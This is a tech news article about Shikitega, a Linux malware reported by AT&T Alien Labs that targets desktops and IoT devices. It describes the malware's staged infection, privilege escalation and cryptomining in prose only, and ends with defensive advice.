Shikitega: New Malware Program Targeting Linux
AT&T Alien Labs has discovered a new Linux malware program targeting endpoints and IoT devices.
Usually, Linux malware targets servers and cloud instances. You know, where there’s big-time CPU horsepower to turn to cryptocurrency mining. Shikitega, however, likes to go for the low-hanging fruit of desktops and IoT devices. Of course, it will happily attack servers as well. Like all malware, it’s an equal opportunity attacker.
According to AT&T Alien Labs, which discovered it, Shikitega comes in a multistage infection chain. The infection starts with a tiny (370 bytes) Executable and Linkable Format (ELF) file. In case you’ve forgotten, or you never knew, never ever download an unknown ELF file. It’s just asking for trouble.
Of course, you may not even know there’s such a minute file hiding inside a larger package. So, just like with Windows, be sure you know what’s in every package and where it came from before installing it.
Then, once in place, another module is downloaded, executed, and then downloads and executes the next one, and so on. Besides bringing in the next, each module has its own specific task. These include downloading and executing the Metasploit meterpreter, hunting down and exploiting Linux vulnerabilities, and setting persistence in the infected machine. It does this last part by trying to run shell programs to set up four crontabs: Two for the currently logged-in user and the other two for root. If you don’t have crontab installed, it will attempt to install and start the crontab service.
Finally, it will try to download and execute a cryptominer and try to grab control of your machine as root. The last is done by trying to use exploits based on CVE-2021-4034, aka PwnKit, and CVE-2021-3493. If you’ve kept your Linux system up to date, which can be a problem if your IoT vendor hasn’t been doing its job, these attacks will fail.
Shikitega hides its files while it’s doing that by using the Shikata Ga Nai polymorphic XOR additive feedback encoder. Using Shikata, it decodes each module until the final shellcode payload is decoded and running.
Next, it downloads and executes additional commands from its command and control (C&C) server. These are run in memory and aren’t stored on your device’s drive.
The point of all this is to turn your machine into a low-powered cryptominer. Specifically XMRig miner, a Monero miner.
So, how do you keep from getting a base case of Shikitega? Simple. Just to the basics, of installing security patches, keeping backups, and never installing unknown programs. You can also use anti-malware programs to your endpoints if you want to use a belt and suspenders approach to your security.
As always, you should be safe from Linux malware if you just practice good server security. The only real danger I see here is with IoT devices. All too often, IoT vendors do a lousy job of keeping their embedded operating systems up to date with security patches. If that’s the case with your devices, I suggest finding replacement gear from a vendor that takes security seriously. Instances of Linux malware are, unfortunately, increasing rapidly.